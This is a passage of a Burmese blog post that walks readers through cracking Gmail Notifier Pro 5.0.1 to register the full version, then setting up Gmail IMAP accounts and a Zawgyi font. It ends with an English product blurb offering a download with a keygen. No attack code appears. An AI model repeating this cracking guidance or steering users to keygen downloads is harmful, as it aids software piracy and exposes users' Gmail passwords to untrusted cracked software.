ConfigData.xml  ဆိုတဲ့ ဖိုင်လေးကို ကလစ်ပေးပြီး အောက်နားက Open ကိုနှိပ်ပေးလိုက်ပါ




ပြီးရင် Gmail Notifier ပရိုဂရမ်ကို ဖွင့်ကြည့်လိုက်ပါ
ပွင့်လာတဲ့ Box ထဲက ဘယ်ဖက်အောက်ဆုံးဒေါင့်နားမှာ Registered ဆိုတဲ့စာလုံးကိုတွေ့ရင် Full Version ဖြစ်သွားပါပြီ

အဲဒီလိုမဟုတ်ခဲ့ရင်လည်း စိတ်မညစ်ပါနဲ့ အဲဒီဆော့ဝဲကို Uninstall လုပ်ပြီး C ထဲမှာရှိနေသမျှ Gmail Notifier နဲ့ဆိုင်တဲ့ ဖိုဒါတွေ ဖိုင်တွေ အားလုံးကို ဖျက်ပစ်လိုက်ပါ
ပြီးရင် Install ပြန်လုပ်ပါ ..
ပြန်ပြီး Crack ပါ ..
သေချာပေါက် Full Version ဖြစ်အောင်လုပ်လို့ရပါတယ်

ကဲ .. Full Version ဖြစ်သွားပြီပေါ့ ..
ဒီဆော့ဝဲကို မသုံးခင် အရင်ဆုံး ဒီဆော့ဝဲနဲ့ ချိတ်ဆက်မယ့် gmail တွေကို လိုက်ပြင်ရအောင်
ကိုယ်ချိတ်ဆက်မယ့် gmail အကောင့်ကို Sing in ၀င်ပါ
ပြီးရင် Settings ကိုနှိပ်ပါ
ပွင့်လာတဲ့ထဲကနေ Mail Settings ကိုနှိပ်ပါ
ပွင့်လာတဲ့ထဲက Forwarding and POP/IMAP
ပွင့်လာတဲ့ထဲက Enable IMAP ရဲ့ရှေ့မှာ အမှတ်တပ်ပေးပြီး အောက်ဆုံးက Save Changes ကိုနှိပ်လိုက်ပါ
ပြီးရင် အဲဒီအကောင့်ကို Sign Out ပြန်ထွက်ပါ





ပြီးရင် Gmail Notifier ဆော့ဝဲကို Run ပါ
ပွင့်လာတဲ့ Box ထဲက Manage accounts ကိုနှိပ်ပါ






ပွင့်လာတဲ့ထဲက Add ကိုနှိပ်ပါ



ပွင့်လာတဲ့ထဲက Google Gmail IMAP ကိုနှိပ်ပါ





ပွင့်လာတဲ့ထဲက Description အကွက်မှာ ကိုယ်သတ်မှတ်ချင်တဲ့နံမည်ကို ထည့်ပါ
Email Address အကွက်မှာ ကိုယ့်ချိတ်ဆက်မယ့် အကောင့်ရဲက email ကိုထည့်ပါ
password အကွက်မှာ အဲဒီအကောင့်ရဲ့ password ကိုထည့်ပါ
ပြီးရင် Ok ကိုနှိပ်ပေးလိုက်ပါ



ဒါဆိုရင် အကောင့်တစ်ခု ချိတ်ဆက်ခြင်း ပြီးသွားပါပြီ ..
တခြားနောက်ထပ် အကောင့်တွေကိုလည်း ဒီလိုပဲ အဆင့်ဆင့် ချိတ်ဆက်ပေးလိုက်ပါ

ကဲ .. ပြီးရင် gmail notifier မှာ ဇော်ဂျီဖောင့် မြင်ရအောင်
Mail ကိုနှိပ်ပြီး ပွင့်လာတဲ့ ဘယ်ဖက်အခြမ်းထဲက Custom font ရှေ့မှာအမှတ်တပ်
ပြီးရင် Zawgyi One ကိုရွေး
အောက်ဆုံးက Ok ကိုနှိပ် ...





ဒါဆိုရင် .. အဆင်ပြေသွားပြီ

အဲ .. Unicode ကို Built In ထည့်ထားပေးတဲ့ Windows 8 သမားတွေအတွက် ဇော်ဂျီဖောင့်ကို လေးဒေါင့်ကွက်တွေအဖြစ်ပဲ မြင်နေရဦးမှာပါ ..
အဲဒီအတွက်တော့ ဒီပို့စ် ထဲမှာ သွားဖတ်ပြီး သေသေချာချာပြင်ယူမှ အဆင်ပြေပါမယ်

ကဲ .. အဆင်ပြေကြပါစေဗျာ

နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး







Gmail Notifier Pro 5.0.1 Full Version


Gmail Notifier Pro is a Windows application capable of checking multiple Gmail accounts for new mail and display notifications.

Feature highlights
- Check multiple Gmail accounts, including Google Apps, for new mail.
- Supports both Atom and IMAP protocols for mail.
- Supports customizable themes and individual account settings, making Gmail Notifier Pro the best looking Gmail notifier on the web!
- Read, write, reply, preview and save attachments, mark as read and delete mail without the web browser. Supports Google Contacts.
- Integration with Google Calendar accounts gives reminders for calendar events.
- Get news notifications from Google News & Google Reader.
- Supports RSS/Atom feeds to get notifications from any news source.
- Gmail Notifier Pro provides many easy-to-use features and settings.
- Define schedules when to check for mail and display notifications.
- In addition to the installation package, Gmail Notifier Pro can also run from a USB-stick without any installation.
- Gmail Notifier Pro supports automatic updates. A new version can be downloaded and installed with a single click.
- Secure account management and encrypted connections (HTTPS / SSL) are used. 100% FREE from virus, spyware and adware.
- Gmail Notifier Pro is simply the best Gmail notifier for Windows.
- Supports 32-bit & 64-bit Windows XP, Windows Vista & Windows 7.
But, it is Ok in Windows 8 ( tested by me).
You can download the program included keygen below link.




Be Enjoy! :)

Baca Selengkapnya ....
Trik SEO Terbaru support Online Shop Baju Wanita - Original design by Bamz | Copyright of android themes.